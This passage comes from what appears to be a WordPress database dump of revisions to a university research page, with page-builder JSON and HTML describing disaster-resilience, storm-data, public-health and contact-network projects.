6\",\"attrs\":{\"id\":\"about-6\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c34\",\"parentId\":\"126-c33\",\"partialId\":126,\"styleRef\":390,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c35\",\"parentId\":\"126-c33\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c35\",\"index\":0,\"id\":\"126-c36\",\"partialId\":126,\"styleRef\":392,\"type\":\"content\",\"props\":{\"content\":\"Urban Scale Energy Assessments\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c35\",\"index\":2,\"id\":\"126-c37\",\"partialId\":126,\"styleRef\":394,\"type\":\"content\",\"props\":{\"content\":\"<p>Often old and outdated, frequently, urban electric grids in America are at odds with residential and commercial usage requirements. Recent weather events, such as the 2021 winter storm in Texas, have exposed serious vulnerabilities in the resilience of the electric infrastructure to support unprecedented surges in electricity demand. The growing threat of such events with climate change and the migration of populations into urban centers requires a reassessment of energy consumption patterns in most US cities. While both private providers and state regulatory bodies have detailed information on energy consumption patterns, there is a need to develop computational models to predict consumption patterns during extreme weather events, including winter storms and heatwaves. This research uses 3D models of commercial and residential buildings  to create a gradient of energy usage with the granularity of a single building and propose a plan for grid distribution optimized for human-centric usage and need.<\\/p>\"}}],\"styleRef\":391,\"type\":\"content\"}],\"id\":\"126-c33\",\"parentId\":\"126-c32\",\"partialId\":126,\"styleRef\":389,\"type\":\"content\"}],\"id\":\"126-c32\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":388,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 3\",\"attrs\":{\"id\":\"about-3\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c16\",\"parentId\":\"126-c15\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c16\",\"index\":0,\"id\":\"126-c17\",\"partialId\":126,\"styleRef\":356,\"type\":\"content\",\"props\":{\"content\":\"Understanding Disaster Impacts using the NOAA Storm Events Database<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c16\",\"index\":2,\"id\":\"126-c18\",\"partialId\":126,\"styleRef\":358,\"type\":\"content\",\"props\":{\"content\":\"<p>The National Oceanic and Atmospheric Administration (NOAA) has an up-to-date database of Storm Events in the US beginning January 1950. The storm events before 1995 require Optical Character Recognition to extract data from scanned documents. Some extraction has been done already, but not for every storm event. Records starting in 1996 are already in plain text. For almost all records, there are natural language narratives, and these narrative\\/s have the potential of containing crucial information about the episodes\\/events. If these narratives were in a more structured format, they could potentially yield a better understanding of destruction patterns and possible focuses for resilience. This two-part project is utilizing modern Optical Character Recognition, Information Retrieval, Deep Learning, and Natural Language Processing Tools in order to data-mine and extract information from these storm event records.<\\/p>\"}}],\"styleRef\":355,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"30\",\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c19\",\"parentId\":\"126-c15\",\"partialId\":126,\"styleRef\":359,\"type\":\"content\"}],\"id\":\"126-c15\",\"parentId\":\"126-c14\",\"partialId\":126,\"styleRef\":354,\"type\":\"content\"}],\"id\":\"126-c14\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":353,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 4\",\"attrs\":{\"id\":\"about-4\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c22\",\"parentId\":\"126-c21\",\"partialId\":126,\"styleRef\":362,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c23\",\"parentId\":\"126-c21\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c23\",\"index\":0,\"id\":\"126-c24\",\"partialId\":126,\"styleRef\":364,\"type\":\"content\",\"props\":{\"content\":\"The DICE Data Repository <br>\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c23\",\"index\":2,\"id\":\"126-c25\",\"partialId\":126,\"styleRef\":366,\"type\":\"content\",\"props\":{\"content\":\"<p>The DICE data repository aims to be a data clearinghouse for spatially-indexed datasets on disease and disaster outcomes, population indicators of vulnerability, hazard and disaster events, and other variables related to the assessment of population risk and resilience to hazards and disasters. In addition to a large database that is accessible via published APIs, DICE researchers are developing an ontology-based framework for hazards and disasters. The proposed ontology will define semantics associated with adverse events &amp; corresponding response and recovery efforts.&nbsp; <br><\\/p>\"}}],\"styleRef\":363,\"type\":\"content\"}],\"id\":\"126-c21\",\"parentId\":\"126-c20\",\"partialId\":126,\"styleRef\":361,\"type\":\"content\"}],\"id\":\"126-c20\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":360,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 5\",\"attrs\":{\"id\":\"about-5\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c28\",\"parentId\":\"126-c27\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c28\",\"index\":0,\"id\":\"126-c29\",\"partialId\":126,\"styleRef\":384,\"type\":\"content\",\"props\":{\"content\":\"Orpheus\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c28\",\"index\":2,\"id\":\"126-c30\",\"partialId\":126,\"styleRef\":386,\"type\":\"content\",\"props\":{\"content\":\"<p>Operational Readiness for Public Health Emergencies in the U.S. (ORPHEUS) is a decision support framework that shall enable public health practitioners and responders to guide individuals, groups, communities, and populations out of the chaos brought upon a geographic region by natural or human-made disasters. Upon prioritizing regional hazards, planning authorities will determine specific mitigation strategies for those hazards. While data-driven tools that can aid regional hazard prioritization have been developed in recent years, we witness a distinct lack of such data-driven tools that facilitate the design of effective response plans capable of addressing specific hazards.<\\/p>\"}}],\"styleRef\":383,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c31\",\"parentId\":\"126-c27\",\"partialId\":126,\"styleRef\":387,\"type\":\"content\"}],\"id\":\"126-c27\",\"parentId\":\"126-c26\",\"partialId\":126,\"styleRef\":382,\"type\":\"content\"}],\"id\":\"126-c26\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":381,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 2\",\"attrs\":{\"id\":\"about-2\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c10\",\"parentId\":\"126-c9\",\"partialId\":126,\"styleRef\":348,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c11\",\"parentId\":\"126-c9\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c11\",\"index\":0,\"id\":\"126-c12\",\"partialId\":126,\"styleRef\":350,\"type\":\"content\",\"props\":{\"content\":\"GSU Contact Network Prediction<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c11\",\"index\":2,\"id\":\"126-c13\",\"partialId\":126,\"styleRef\":352,\"type\":\"content\",\"props\":{\"content\":\"<p>The name of this project, chimera, has two meanings, which metaphorically fit well with our project. First, a chimera is a Greek mythological, hybrid lion\\/goat\\/snake fire-breathing creature, which reflects&nbsp;our approach to this research. We are using an ensemble of simulation types\\/models to create a picture of scheduled contacts that a GSU student may make on a given day in the school semester. Another meaning for chimera is a thing that is impossible to achieve, and this is also critical to the project; No matter how close we try to simulate reality, the model will never achieve anywhere close to perfection. To combat this impossibility, we work to develop abstract methods to account for this implicit imperfection to get as close as we can without flying too close to the sun. In our research for Project Chimera, we endeavor to create an ensemble simulation model to ultimately allow us to simulate efforts to reduce the number of \\u201cscheduled\\u201d contacts a GSU student makes throughout the day.<\\/p>\"}}],\"styleRef\":349,\"type\":\"content\"}],\"id\":\"126-c9\",\"parentId\":\"126-c8\",\"partialId\":126,\"styleRef\":347,\"type\":\"content\"}],\"id\":\"126-c8\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":346,\"type\":\"content\"}],\"id\":\"126-c1\",\"partialId\":126,\"styleRef\":338,\"type\":\"content\"}','','','inherit','closed','closed','','438-revision-v1','','','2023-09-29 10:40:35','2023-09-29 14:40:35','',438,'https://gsudice.dataconn.net/?p=1492',0,'revision','',0),(1493,1,'2023-09-29 10:40:35','2023-09-29 14:40:35','<div data-colibri-id=\"126-c1\" class=\"style-338 style-local-126-c1 position-relative\">\n  <!---->\n  <div data-colibri-component=\"section\" data-colibri-id=\"126-c32\" id=\"about-6\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-388 style-local-126-c32 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-fluid-container\">\n      <!---->\n      <div data-colibri-id=\"126-c33\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-389 style-local-126-c33 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-390-outer style-local-126-c34-outer\">\n            <div data-colibri-id=\"126-c34\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-390 style-local-126-c34 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                <!---->\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-391-outer style-local-126-c35-outer\">\n            <div data-colibri-id=\"126-c35\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-391 style-local-126-c35 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"126-c36\" class=\"h-global-transition-all h-heading style-392 style-local-126-c36 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-392 style-local-126-c36\">\n                    <!---->\n                    <!---->\n                    <h5 class=\"\">Urban Scale Energy Assessments</h5>\n                  </div>\n                </div>\n                <div data-colibri-id=\"126-c37\" class=\"h-text h-text-component style-394 style-local-126-c37 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Often old and outdated, frequently, urban electric grids in America are at odds with residential and commercial usage requirements. Recent weather events, such as the 2021 winter storm in Texas, have exposed serious vulnerabilities\n                      in the resilience of the electric infrastructure to support unprecedented surges in electricity demand. The growing threat of such events with climate change and the migration of populations into urban centers requires a reassessment\n                      of energy consumption patterns in most US cities. While both private providers and state regulatory bodies have detailed information on energy consumption patterns, there is a need to develop computational models to predict consumption\n                      patterns during extreme weather events, including winter storms and heatwaves. This research uses 3D models of commercial and residential buildings to create a gradient of energy usage with the granularity of a single building and\n                      propose a plan for grid distribution optimized for human-centric usage and need.</p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"126-c14\" id=\"about-3\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-353 style-local-126-c14 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-fluid-container\">\n      <!---->\n      <div data-colibri-id=\"126-c15\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-354 style-local-126-c15 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-355-outer style-local-126-c16-outer\">\n            <div data-colibri-id=\"126-c16\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-355 style-local-126-c16 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"126-c17\" class=\"h-global-transition-all h-heading style-356 style-local-126-c17 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-356 style-local-126-c17\">\n                    <!---->\n                    <!---->\n                    <h5 class=\"\">Understanding Disaster Impacts using the NOAA Storm Events Database</h5>\n                  </div>\n                </div>\n                <div data-colibri-id=\"126-c18\" class=\"h-text h-text-component style-358 style-local-126-c18 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>The National Oceanic and Atmospheric Administration (NOAA) has an up-to-date database of Storm Events in the US beginning January 1950. The storm events before 1995 require Optical Character Recognition to extract data from scanned\n                      documents. Some extraction has been done already, but not for every storm event. Records starting in 1996 are already in plain text. For almost all records, there are natural language narratives, and these narrative/s have the potential\n                      of containing crucial information about the episodes/events. If these narratives were in a more structured format, they could potentially yield a better understanding of destruction patterns and possible focuses for resilience. This\n                      two-part project is utilizing modern Optical Character Recognition, Information Retrieval, Deep Learning, and Natural Language Processing Tools in order to data-mine and extract information from these storm event records.</p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-359-outer style-local-126-c19-outer\">\n            <div data-colibri-id=\"126-c19\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-359 style-local-126-c19 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                <!---->\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"126-c20\" id=\"about-4\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-360 style-local-126-c20 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-fluid-container\">\n      <!---->\n      <div data-colibri-id=\"126-c21\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-361 style-local-126-c21 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-362-outer style-local-126-c22-outer\">\n            <div data-colibri-id=\"126-c22\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-362 style-local-126-c22 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                <!---->\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-363-outer style-local-126-c23-outer\">\n            <div data-colibri-id=\"126-c23\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-363 style-local-126-c23 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"126-c24\" class=\"h-global-transition-all h-heading style-364 style-local-126-c24 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-364 style-local-126-c24\">\n                    <!---->\n                    <!---->\n                    <h5 class=\"\">The DICE Data Repository </h5>\n                  </div>\n                </div>\n                <div data-colibri-id=\"126-c25\" class=\"h-text h-text-component style-366 style-local-126-c25 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>The DICE data repository aims to be a data clearinghouse for spatially-indexed datasets on disease and disaster outcomes, population indicators of vulnerability, hazard and disaster events, and other variables related to the assessment\n                      of population risk and resilience to hazards and disasters. In addition to a large database that is accessible via published APIs, DICE researchers are developing an ontology-based framework for hazards and disasters. The proposed\n                      ontology will define semantics associated with adverse events &amp; corresponding response and recovery efforts.&nbsp;\n                      <br>\n                    </p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"126-c26\" id=\"about-5\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-381 style-local-126-c26 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-fluid-container\">\n      <!---->\n      <div data-colibri-id=\"126-c27\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-382 style-local-126-c27 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-383-outer style-local-126-c28-outer\">\n            <div data-colibri-id=\"126-c28\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-383 style-local-126-c28 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"126-c29\" class=\"h-global-transition-all h-heading style-384 style-local-126-c29 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-384 style-local-126-c29\">\n                    <!---->\n                    <!---->\n                    <h5 class=\"\">Orpheus</h5>\n                  </div>\n                </div>\n                <div data-colibri-id=\"126-c30\" class=\"h-text h-text-component style-386 style-local-126-c30 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Operational Readiness for Public Health Emergencies in the U.S. (ORPHEUS) is a decision support framework that shall enable public health practitioners and responders to guide individuals, groups, communities, and populations out of\n                      the chaos brought upon a geographic region by natural or human-made disasters. Upon prioritizing regional hazards, planning authorities will determine specific mitigation strategies for those hazards. While data-driven tools that\n                      can aid regional hazard prioritization have been developed in recent years, we witness a distinct lack of such data-driven tools that facilitate the design of effective response plans capable of addressing specific hazards.</p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-387-outer style-local-126-c31-outer\">\n            <div data-colibri-id=\"126-c31\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-387 style-local-126-c31 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                <!---->\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"126-c8\" id=\"about-2\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-346 style-local-126-c8 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-fluid-container\">\n      <!---->\n      <div data-colibri-id=\"126-c9\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-347 style-local-126-c9 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-348-outer style-local-126-c10-outer\">\n            <div data-colibri-id=\"126-c10\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-348 style-local-126-c10 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                <!---->\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-349-outer style-local-126-c11-outer\">\n            <div data-colibri-id=\"126-c11\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-349 style-local-126-c11 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"126-c12\" class=\"h-global-transition-all h-heading style-350 style-local-126-c12 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-350 style-local-126-c12\">\n                    <!---->\n                    <!---->\n                    <h5 class=\"\">GSU Contact Network Prediction</h5>\n                  </div>\n                </div>\n                <div data-colibri-id=\"126-c13\" class=\"h-text h-text-component style-352 style-local-126-c13 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>The name of this project, chimera, has two meanings, which metaphorically fit well with our project. First, a chimera is a Greek mythological, hybrid lion/goat/snake fire-breathing creature, which reflects&nbsp;our approach to this\n                      research. We are using an ensemble of simulation types/models to create a picture of scheduled contacts that a GSU student may make on a given day in the school semester. Another meaning for chimera is a thing that is impossible\n                      to achieve, and this is also critical to the project; No matter how close we try to simulate reality, the model will never achieve anywhere close to perfection. To combat this impossibility, we work to develop abstract methods to\n                      account for this implicit imperfection to get as close as we can without flying too close to the sun. In our research for Project Chimera, we endeavor to create an ensemble simulation model to ultimately allow us to simulate efforts\n                      to reduce the number of “scheduled” contacts a GSU student makes throughout the day.</p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','Research','','inherit','closed','closed','','126-revision-v1','','','2023-09-29 10:40:35','2023-09-29 14:40:35','',126,'https://gsudice.dataconn.net/?p=1493',0,'revision','',0),(1499,1,'2023-09-29 10:41:07','2023-09-29 14:41:07','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 6\",\"attrs\":{\"id\":\"about-6\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c34\",\"parentId\":\"126-c33\",\"partialId\":126,\"styleRef\":390,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c35\",\"parentId\":\"126-c33\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c35\",\"index\":0,\"id\":\"126-c36\",\"partialId\":126,\"styleRef\":392,\"type\":\"content\",\"props\":{\"content\":\"Urban Scale Energy Assessments\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c35\",\"index\":2,\"id\":\"126-c37\",\"partialId\":126,\"styleRef\":394,\"type\":\"content\",\"props\":{\"content\":\"<p>Often old and outdated, frequently, urban electric grids in America are at odds with residential and commercial usage requirements. Recent weather events, such as the 2021 winter storm in Texas, have exposed serious vulnerabilities in the resilience of the electric infrastructure to support unprecedented surges in electricity demand. The growing threat of such events with climate change and the migration of populations into urban centers requires a reassessment of energy consumption patterns in most US cities. While both private providers and state regulatory bodies have detailed information on energy consumption patterns, there is a need to develop computational models to predict consumption patterns during extreme weather events, including winter storms and heatwaves. This research uses 3D models of commercial and residential buildings  to create a gradient of energy usage with the granularity of a single building and propose a plan for grid distribution optimized for human-centric usage and need.<\\/p>\"}}],\"styleRef\":391,\"type\":\"content\"}],\"id\":\"126-c33\",\"parentId\":\"126-c32\",\"partialId\":126,\"styleRef\":389,\"type\":\"content\"}],\"id\":\"126-c32\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":388,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 3\",\"attrs\":{\"id\":\"about-3\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c16\",\"parentId\":\"126-c15\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c16\",\"index\":0,\"id\":\"126-c17\",\"partialId\":126,\"styleRef\":356,\"type\":\"content\",\"props\":{\"content\":\"Understanding Disaster Impacts using the NOAA Storm Events Database<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c16\",\"index\":2,\"id\":\"126-c18\",\"partialId\":126,\"styleRef\":358,\"type\":\"content\",\"props\":{\"content\":\"<p>The National Oceanic and Atmospheric Administration (NOAA) has an up-to-date database of Storm Events in the US beginning January 1950. The storm events before 1995 require Optical Character Recognition to extract data from scanned documents. Some extraction has been done already, but not for every storm event. Records starting in 1996 are already in plain text. For almost all records, there are natural language narratives, and these narrative\\/s have the potential of containing crucial information about the episodes\\/events. If these narratives were in a more structured format, they could potentially yield a better understanding of destruction patterns and possible focuses for resilience. This two-part project is utilizing modern Optical Character Recognition, Information Retrieval, Deep Learning, and Natural Language Processing Tools in order to data-mine and extract information from these storm event 